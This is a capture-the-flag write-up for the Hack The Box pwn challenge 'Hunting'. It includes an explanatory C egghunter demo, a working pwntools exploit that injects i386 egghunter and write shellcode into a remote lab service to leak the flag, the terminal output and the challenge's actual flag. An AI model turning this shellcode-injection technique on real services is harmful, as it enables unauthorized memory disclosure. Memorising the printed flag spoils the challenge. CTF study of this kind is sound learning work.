Hunting

I've hidden the flag very carefully, you'll never manage to find it! Please note that the goal is to find the flag, and not to obtain a shell.

Decompile the binary with Hex-Rays or any other decompiler (Binary Ninja, Ghidra, etc.). I used Decompiler Explorer, which makes it easy to search through the decompiled code.

Searching the decompiled code for the flag shows that it is hardcoded in the binary and copied into memory at runtime rather than being handed to us directly.

The string "aHtbXxxxxxxxxxx", which holds the flag, is copied with strcpy into the mapped memory region dest.

To hunt for the flag we use egghunter shellcode: it walks the process's memory page by page looking for the byte sequence given as a parameter (the "egg", here HTB{), and it skips unmapped pages so the search does not crash before it reaches the flag.
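As an added example (not the page's exploit and not pwntools' egghunter implementation), here is the same search strategy written in C so the mechanics are visible: a harmless syscall, access(2), probes each page before it is touched, unreadable pages are skipped whole, and readable ones are scanned byte by byte for the egg. The memory layout, the flag text and the function names (readable, egghunt, demo, sample_offset) are constructed for the demonstration and do not come from the challenge.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

/* Probe whether memory at addr can be read without risking SIGSEGV.
 * access(2) copies its "path" argument out of user memory and fails with
 * EFAULT when the address is unmapped or unreadable; any other outcome
 * (success, ENOENT, ENAMETOOLONG, ...) means the bytes were readable.
 * This is the trick the shellcode egghunter uses: int 0x80 with
 * eax = SYS_access, then a check for -EFAULT (0xf2) in al. */
static int readable(const void *addr) {
    if (access((const char *)addr, F_OK) == 0)
        return 1;
    return errno != EFAULT;
}

/* Hunt for egg in [start, start + span).  Unreadable pages are skipped
 * whole; readable ones are scanned byte by byte.  Returns the address of
 * the first match, or NULL. */
const unsigned char *egghunt(const void *start, size_t span,
                             const void *egg, size_t egglen) {
    size_t page = (size_t)sysconf(_SC_PAGESIZE);
    uintptr_t cur = (uintptr_t)start;
    uintptr_t end = cur + span;

    while (cur + egglen <= end) {
        uintptr_t next_page = (cur | (page - 1)) + 1;
        if (!readable((const void *)cur)) {
            cur = next_page;            /* whole page is off limits: skip it */
            continue;
        }
        /* Only compare where the full egg lies in memory known to be
         * readable: a candidate straddling into an unmapped page would fault. */
        uintptr_t limit = next_page;
        if (next_page < end && readable((const void *)next_page))
            limit = next_page + egglen - 1;
        for (; cur + egglen <= limit && cur + egglen <= end; cur++)
            if (memcmp((const void *)cur, egg, egglen) == 0)
                return (const unsigned char *)cur;
        cur = next_page;
    }
    return NULL;
}

/* Constructed demo layout (not the challenge binary): an 8-page anonymous
 * mapping whose first six pages are made PROT_NONE, with a made-up flag
 * planted in the seventh page at an odd offset.  The hunter has to step
 * over the unreadable pages before it can find the egg.  Returns 0 on
 * success, a negative code otherwise. */
#define DEMO_FLAG "HTB{constructed_example_flag}"
int demo(void) {
    size_t page = (size_t)sysconf(_SC_PAGESIZE), npages = 8;
    size_t flag_off = 6 * page + 0x123;
    unsigned char *region = mmap(NULL, npages * page, PROT_READ | PROT_WRITE,
                                 MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (region == MAP_FAILED)
        return -1;
    memcpy(region + flag_off, DEMO_FLAG, sizeof DEMO_FLAG);
    if (mprotect(region, 6 * page, PROT_NONE) != 0)
        return -2;

    const unsigned char *hit = egghunt(region, npages * page, "HTB{", 4);
    int rc = 0;
    if (hit != region + flag_off)
        rc = -3;                        /* not found, or found in the wrong place */
    else if (strcmp((const char *)hit, DEMO_FLAG) != 0)
        rc = -4;
    else
        printf("egg found at offset 0x%zx: %s\n", flag_off, (const char *)hit);
    munmap(region, npages * page);
    return rc;
}

/* Smaller check on ordinary readable memory: offset of the egg inside a
 * static buffer (constructed data), or -1 if the hunter misses it. */
static const unsigned char sample[] = "....\x00..HTB{x}";
long sample_offset(void) {
    const unsigned char *hit = egghunt(sample, sizeof sample, "HTB{", 4);
    return hit ? (long)(hit - sample) : -1;
}

int main(void) {
    return demo() == 0 ? 0 : 1;
}
```

Build with cc -o egghunt egghunt.c and run it. One caveat worth knowing: the access(2) probe reads from the address until it hits a NUL or PATH_MAX bytes, so a readable page that runs straight into unmapped memory without a NUL is reported as unreadable and gets skipped; that is one reason classic shellcode hunters probe a few bytes into the candidate egg rather than at its first byte.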

Exploit :

from pwn import *

# io = process('./hunting')
io = remote('83.136.249.57', 30765)

# Egghunter: scan memory page by page for the 4-byte egg 'HTB{'.
# When it returns, the write below relies on the hunter's register state:
# the flag pointer is in ebx, ecx is 0 and edx holds a large value.
shellcode = asm(shellcraft.i386.linux.egghunter('HTB{'))

# write(1, flag_ptr, edx): print the flag (and whatever follows it in the mapping)
shellcode += asm('''
	xor eax, eax      /* eax = 0 */
	xchg ecx, ebx     /* ecx = flag pointer (buf), ebx = 0 */
	inc ebx           /* ebx = 1 (stdout) */
	mov al, 0x4       /* SYS_write */
	int 0x80          /* edx is still large, so the rest of the mapping is printed too */
''')

io.sendline(shellcode)
print(io.recvall())

Let's run the exploit locally first, then against the remote instance.

┌──(kali㉿kali)-[~/hackthebox/pwn/pwn_hunting]
└─$ python exploit.py
[+] Starting local process './hunting': pid 96508
[+] Receiving all data: Done (1.00KB)
[*] Stopped process './hunting' (pid 96508)
b'HTB{XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX}\x00\x00\x00\x00\x00\x00\x00\...

And remotely:

┌──(kali㉿kali)-[~/hackthebox/pwn/pwn_hunting]
└─$ python exploit.py
[+] Opening connection to 83.136.249.57 on port 30765: Done
[+] Receiving all data: Done (1.06KB)
[*] Closed connection to 83.136.249.57 port 30765
b'HTB{H0w_0n_34rth_d1d_y0u_f1nd_m3?!?}\x00\x00\x00\x00\x00\x00\

Flag :

HTB{H0w_0n_34rth_d1d_y0u_f1nd_m3?!?}
